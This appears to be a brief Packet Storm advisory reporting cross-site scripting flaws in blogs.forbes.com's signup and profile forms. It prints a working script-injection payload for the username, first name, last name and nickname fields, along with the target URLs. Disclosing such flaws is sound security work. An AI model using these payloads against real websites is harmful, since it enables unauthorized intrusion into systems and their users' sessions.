The blogs.forbes.com site suffers from a cross site scripting vulnerability.
1651bd395a33d5176737bdd69d4bd00057454affe4a2af9862c10eb5be628cf4 TITLE: FORBES Cross Site Scripting
vendor: FORBES
Author: r007k17-w
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Google Dork:2011 Forbes.com LLC™
-------------------------------------------------------------------------------------------------------------------------------------------
DEMO:
1. http://blogs.forbes.com/wp-signup.php
In 'username' field POSTDATA="><script>alert(document.domain)</script>
2.http://blogs.forbes.com/wp-admin/user/profile.php
After Signup in 'Profile settings'
'First name', 'last name', 'Nickname' fields are vulnerable to XSS
POSTDATA: "><script>alert(document.domain)</script>
---------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts,L0rd CrUs4d3r,3ps1lonl4mbd4,A1-w1n6( N17|<
),1nJ3ct0r t3am and all my friends
------------------------------------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed